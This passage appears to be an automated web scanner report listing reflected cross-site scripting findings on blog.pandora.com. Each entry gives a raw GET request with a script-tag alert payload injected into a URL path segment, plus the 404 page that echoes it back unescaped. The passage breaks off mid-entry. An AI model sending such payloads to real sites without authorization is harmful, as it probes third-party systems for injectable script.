1.298. http://blog.pandora.com/pandora/archives/2010/12/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/12/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8e5b4<script>alert(1)</script>6e5ab5102c8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010/128e5b4<script>alert(1)</script>6e5ab5102c8/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:16 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/128e5b4<script>alert(1)</script>6e5ab5102c8/ was not found on this server.</p>
...[SNIP]...

1.299. http://blog.pandora.com/pandora/archives/2010/12/holiday-music.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/12/holiday-music.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bc67e<script>alert(1)</script>34ab249b04a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandorabc67e<script>alert(1)</script>34ab249b04a/archives/2010/12/holiday-music.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:09 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 367


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorabc67e<script>alert(1)</script>34ab249b04a/archives/2010/12/holiday-music.html was not found on this server.</p>
...[SNIP]...

1.300. http://blog.pandora.com/pandora/archives/2010/12/holiday-music.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/12/holiday-music.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9cc4e<script>alert(1)</script>4b764c67cc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives9cc4e<script>alert(1)</script>4b764c67cc/2010/12/holiday-music.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:11 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 366


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives9cc4e<script>alert(1)</script>4b764c67cc/2010/12/holiday-music.html was not found on this server.</p>
...[SNIP]...

1.301. http://blog.pandora.com/pandora/archives/2010/12/holiday-music.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/12/holiday-music.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload bd53e<script>alert(1)</script>7f56f5a8144 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010bd53e<script>alert(1)</script>7f56f5a8144/12/holiday-music.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:13 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 367


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010bd53e<script>alert(1)</script>7f56f5a8144/12/holiday-music.html was not found on this server.</p>
...[SNIP]...

1.302. http://blog.pandora.com/pandora/archives/2010/12/holiday-music.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/12/holiday-music.html

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 84903<script>alert(1)</script>e925b373d1b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010/1284903<script>alert(1)</script>e925b373d1b/holiday-music.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:16 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 367


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/1284903<script>alert(1)</script>e925b373d1b/holiday-music.html was not found on this server.</p>
...[SNIP]...

1.303. http://blog.pandora.com/pandora/archives/2010/12/holiday-music.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/12/holiday-music.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e86cc<script>alert(1)</script>2286b5dabd7 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010/12/holiday-music.htmle86cc<script>alert(1)</script>2286b5dabd7 HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:19 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 367


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/12/holiday-music.htmle86cc<script>alert(1)</script>2286b5dabd7 was not found on this server.</p>
...[SNIP]...

1.304. http://blog.pandora.com/pandora/archives/2010/12/themed-stations.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/12/themed-stations.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5d3cd<script>alert(1)</script>a8a76e357fe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora5d3cd<script>alert(1)</script>a8a76e357fe/archives/2010/12/themed-stations.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:17 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora5d3cd<script>alert(1)</script>a8a76e357fe/archives/2010/12/themed-stations.html was not found on this server.</p>
...[SNIP]...

1.305. http://blog.pandora.com/pandora/archives/2010/12/themed-stations.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/12/themed-stations.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 25283<script>alert(1)</script>32ad766d12b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives25283<script>alert(1)</script>32ad766d12b/2010/12/themed-stations.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:19 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives25283<script>alert(1)</script>32ad766d12b/2010/12/themed-stations.html was not found on this server.</p>
...[SNIP]...

1.306. http://blog.pandora.com/pandora/archives/2010/12/themed-stations.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/12/themed-stations.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ac8ae<script>alert(1)</script>07d5f78715a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010ac8ae<script>alert(1)</script>07d5f78715a/12/themed-stations.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:22 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010ac8ae<script>alert(1)</script>07d5f78715a/12/themed-stations.html was not found on this server.</p>
...[SNIP]...

1.307. http://blog.pandora.com/pandora/archives/2010/12/themed-stations.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/12/themed-stations.html

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6f003<script>alert(1)</script>c2c8f4a2ec0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010/126f003<script>alert(1)</script>c2c8f4a2ec0/themed-stations.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:25 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/126f003<script>alert(1)</script>c2c8f4a2ec0/themed-stations.html was not found on this server.</p>
...[SNIP]...

1.308. http://blog.pandora.com/pandora/archives/2010/12/themed-stations.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/12/themed-stations.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c1b2a<script>alert(1)</script>283fea933c9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010/12/themed-stations.htmlc1b2a<script>alert(1)</script>283fea933c9 HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:28 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/12/themed-stations.htmlc1b2a<script>alert(1)</script>283fea933c9 was not found on this server.</p>
...[SNIP]...

1.309. http://blog.pandora.com/pandora/archives/arizona/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/arizona/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2ed28<script>alert(1)</script>2b8c9060753 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora2ed28<script>alert(1)</script>2b8c9060753/archives/arizona/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:44 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora2ed28<script>alert(1)</script>2b8c9060753/archives/arizona/ was not found on this server.</p>
...[SNIP]...

1.310. http://blog.pandora.com/pandora/archives/arizona/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/arizona/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 43add<script>alert(1)</script>997001f8093 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives43add<script>alert(1)</script>997001f8093/arizona/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:46 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives43add<script>alert(1)</script>997001f8093/arizona/ was not found on this server.</p>
...[SNIP]...

1.311. http://blog.pandora.com/pandora/archives/arizona/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/arizona/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f01a6<script>alert(1)</script>b621b2a3f06 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/arizonaf01a6<script>alert(1)</script>b621b2a3f06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:49 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/arizonaf01a6<script>alert(1)</script>b621b2a3f06/ was not found on this server.</p>
...[SNIP]...

1.312. http://blog.pandora.com/pandora/archives/california/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/california/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 70767<script>alert(1)</script>cc798d55c4c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora70767<script>alert(1)</script>cc798d55c4c/archives/california/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:58 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 352


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora70767<script>alert(1)</script>cc798d55c4c/archives/california/ was not found on this server.</p>
...[SNIP]...

1.313. http://blog.pandora.com/pandora/archives/california/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/california/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d529c<script>alert(1)</script>b54dc99c7a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesd529c<script>alert(1)</script>b54dc99c7a/california/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:00 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 351


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesd529c<script>alert(1)</script>b54dc99c7a/california/ was not found on this server.</p>
...[SNIP]...

1.314. http://blog.pandora.com/pandora/archives/california/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/california/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7d9cb<script>alert(1)</script>1d67bc84c6b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/california7d9cb<script>alert(1)</script>1d67bc84c6b/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:03 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 352
Connection: close
Content-Type: text/html


